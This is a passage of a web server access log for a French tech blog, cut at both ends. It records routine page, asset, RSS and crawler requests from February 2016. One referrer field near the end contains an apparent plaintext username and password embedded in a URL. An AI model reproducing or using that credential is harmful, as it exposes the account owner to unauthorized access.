x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:01:41:12 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:01:41:12 -0800] \"GET /wp-content/uploads/2015/02/3152875867_148b09f57d_z.jpg HTTP/1.1\" 200 44181 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:01:41:12 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.179.93 - - [08/Feb/2016:01:41:13 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.179.93 - - [08/Feb/2016:01:41:13 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.179.93 - - [08/Feb/2016:01:41:13 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.179.93 - - [08/Feb/2016:01:41:13 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [08/Feb/2016:01:41:16 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [08/Feb/2016:01:41:16 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [08/Feb/2016:01:41:16 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [08/Feb/2016:01:41:16 -0800] \"GET /wp-content/uploads/2015/02/Hedge-Funds-and-Social-Media.jpg HTTP/1.1\" 200 768386 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:01:41:18 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:01:41:18 -0800] \"GET /wp-content/uploads/2015/02/3152875867_148b09f57d_z-50x50.jpg HTTP/1.1\" 200 1825 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:01:41:18 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n198.58.103.92 - - [08/Feb/2016:01:41:37 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n195.68.195.30 - - [08/Feb/2016:01:43:34 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/raodath-aminou-la-revolution-du-commerce-est-en/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n195.68.195.30 - - [08/Feb/2016:01:43:34 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/raodath-aminou-la-revolution-du-commerce-est-en/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n195.68.195.30 - - [08/Feb/2016:01:43:34 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33587 \"http://techmeup.co/raodath-aminou-la-revolution-du-commerce-est-en/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n195.68.195.30 - - [08/Feb/2016:01:43:34 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/raodath-aminou-la-revolution-du-commerce-est-en/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n195.68.195.30 - - [08/Feb/2016:01:43:34 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n195.68.195.30 - - [08/Feb/2016:01:43:34 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/raodath-aminou-la-revolution-du-commerce-est-en/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n195.68.195.30 - - [08/Feb/2016:01:43:38 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/raodath-aminou-la-revolution-du-commerce-est-en/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n80.13.10.184 - - [08/Feb/2016:01:48:32 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15476 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko)\"\n80.13.10.184 - - [08/Feb/2016:01:48:46 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n80.13.10.184 - - [08/Feb/2016:01:49:06 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n178.18.180.78 - - [08/Feb/2016:01:52:09 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n178.18.180.78 - - [08/Feb/2016:01:52:09 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 504 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n178.18.180.78 - - [08/Feb/2016:01:52:09 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n178.18.180.78 - - [08/Feb/2016:01:52:10 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n178.18.180.78 - - [08/Feb/2016:01:52:10 -0800] \"GET /wp-content/uploads/2014/09/logo-transparent-horizontal-1024x482.png HTTP/1.1\" 200 334990 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n178.18.180.78 - - [08/Feb/2016:01:52:11 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n178.18.180.78 - - [08/Feb/2016:01:52:12 -0800] \"GET /wp-content/uploads/2014/10/tumblr_inline_nd4oz3bywE1sygmpd-50x50.jpg HTTP/1.1\" 200 2745 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n91.207.208.113 - - [08/Feb/2016:01:52:48 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/601.4.4\"\n91.207.208.113 - - [08/Feb/2016:01:52:48 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/601.4.4\"\n91.207.208.113 - - [08/Feb/2016:01:52:48 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/601.4.4\"\n91.207.208.113 - - [08/Feb/2016:01:52:48 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/601.4.4\"\n91.207.208.113 - - [08/Feb/2016:01:52:48 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/601.4.4\"\n91.207.208.113 - - [08/Feb/2016:01:52:48 -0800] \"GET /wp-content/uploads/2014/09/tumblr_inline_nbjvoh6HDc1sa6hof-50x50.jpg HTTP/1.1\" 200 2074 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/601.4.4\"\n91.207.208.113 - - [08/Feb/2016:01:52:49 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/601.4.4\"\n193.164.197.233 - - [08/Feb/2016:01:56:16 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko)\"\n213.180.206.196 - - [08/Feb/2016:01:56:22 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (compatible; YandexMetrika/2.0; +http://yandex.com/bots mtmon01g.yandex.ru)\"\n193.164.197.233 - - [08/Feb/2016:01:56:30 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n205.167.7.244 - - [08/Feb/2016:01:59:42 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36\"\n205.167.7.244 - - [08/Feb/2016:01:59:42 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6228 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36\"\n205.167.7.244 - - [08/Feb/2016:01:59:42 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36\"\n205.167.7.244 - - [08/Feb/2016:01:59:42 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36\"\n205.167.7.244 - - [08/Feb/2016:01:59:43 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36\"\n205.167.7.244 - - [08/Feb/2016:01:59:43 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36\"\n205.167.7.244 - - [08/Feb/2016:01:59:46 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 986 \"-\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36\"\n205.167.7.244 - - [08/Feb/2016:02:06:31 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 593 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36\"\n70.211.135.194 - - [08/Feb/2016:02:08:20 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6229 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n70.211.135.194 - - [08/Feb/2016:02:08:21 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n70.211.135.194 - - [08/Feb/2016:02:08:21 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n70.211.135.194 - - [08/Feb/2016:02:08:21 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n70.211.135.194 - - [08/Feb/2016:02:08:21 -0800] \"GET /wp-content/uploads/2015/03/4N8A4857-300x225.jpg HTTP/1.1\" 200 20280 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n70.211.135.194 - - [08/Feb/2016:02:08:21 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n70.211.135.194 - - [08/Feb/2016:02:08:22 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n70.211.135.194 - - [08/Feb/2016:02:08:22 -0800] \"GET /wp-content/uploads/2015/02/photo-7-300x225.jpg HTTP/1.1\" 200 17363 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n77.34.218.205 - - [08/Feb/2016:02:14:34 -0800] \"GET /favicon.ico HTTP/1.1\" 200 239 \"-\" \"Mozilla/5.0 (Linux; Android 4.1.2; GT-I8552 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 YaBrowser/15.12.2.6773.00 Yowser/2.5.3 Mobile Safari/537.36\"\n42.156.136.53 - - [08/Feb/2016:02:24:08 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"YisouSpider\"\n206.214.15.241 - - [08/Feb/2016:02:33:02 -0800] \"GET /wp-login.php HTTP/1.1\" 200 3066 \"-\" \"Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0\"\n2.1.72.179 - - [08/Feb/2016:02:36:20 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n66.249.64.138 - - [08/Feb/2016:02:49:14 -0800] \"GET /2015/01/ HTTP/1.1\" 200 5314 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n89.251.61.141 - - [08/Feb/2016:02:52:17 -0800] \"GET /wp-content/uploads/2015/03/1-l57K-8uyN9ELuGbgcaItmw-1024x524.png HTTP/1.1\" 200 190496 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n198.58.99.82 - - [08/Feb/2016:02:54:04 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n109.69.188.61 - - [08/Feb/2016:02:54:13 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n109.69.188.61 - - [08/Feb/2016:02:54:13 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6228 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n109.69.188.61 - - [08/Feb/2016:02:54:13 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n109.69.188.61 - - [08/Feb/2016:02:54:14 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n109.69.188.61 - - [08/Feb/2016:02:54:14 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n109.69.188.61 - - [08/Feb/2016:02:54:15 -0800] \"GET /wp-content/uploads/2014/06/tumblr_inline_n5su4nS9Fe1sa6hof-50x50.jpg HTTP/1.1\" 200 1897 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n109.69.188.61 - - [08/Feb/2016:02:54:22 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/?cf_action=sync_comments&post_id=30 HTTP/1.1\" 200 309 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n193.48.4.6 - - [08/Feb/2016:02:55:52 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg HTTP/1.1\" 200 97500 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n86.246.217.7 - - [08/Feb/2016:02:56:17 -0800] \"GET /feed/ HTTP/1.1\" 304 219 \"-\" \"Mozilla/5.0 Vienna/3.0.9\"\n90.83.207.33 - - [08/Feb/2016:03:00:40 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 36582 \"http://techmeup.co/rencontre-avec-nicolas-dessaigne-ceo-dalgolia/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n90.83.207.33 - - [08/Feb/2016:03:00:40 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 14285 \"http://techmeup.co/rencontre-avec-nicolas-dessaigne-ceo-dalgolia/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n90.83.207.33 - - [08/Feb/2016:03:00:40 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 7529 \"http://techmeup.co/rencontre-avec-nicolas-dessaigne-ceo-dalgolia/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n90.83.207.33 - - [08/Feb/2016:03:00:40 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 788 \"http://techmeup.co/rencontre-avec-nicolas-dessaigne-ceo-dalgolia/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n90.83.207.33 - - [08/Feb/2016:03:00:40 -0800] \"GET /wp-content/uploads/2015/03/Mathilde-le-Rouzic-Quaelead-50x50.jpg HTTP/1.1\" 200 2376 \"http://techmeup.co/rencontre-avec-nicolas-dessaigne-ceo-dalgolia/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n90.83.207.33 - - [08/Feb/2016:03:00:41 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n80.13.10.184 - - [08/Feb/2016:03:01:14 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15528 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko)\"\n80.13.10.184 - - [08/Feb/2016:03:01:27 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n80.13.10.184 - - [08/Feb/2016:03:01:45 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n207.46.13.30 - - [08/Feb/2016:03:05:23 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n202.39.169.163 - - [08/Feb/2016:03:06:02 -0800] \"GET /je-viens-chercher-mon-stage-dans-la-silicon-valley/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n202.39.169.163 - - [08/Feb/2016:03:06:16 -0800] \"GET /je-viens-chercher-mon-stage-dans-la-silicon-valley HTTP/1.1\" 301 446 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n62.210.142.23 - jez [08/Feb/2016:03:06:20 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://jez:lumn0h3D@techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n162.243.175.194 - - 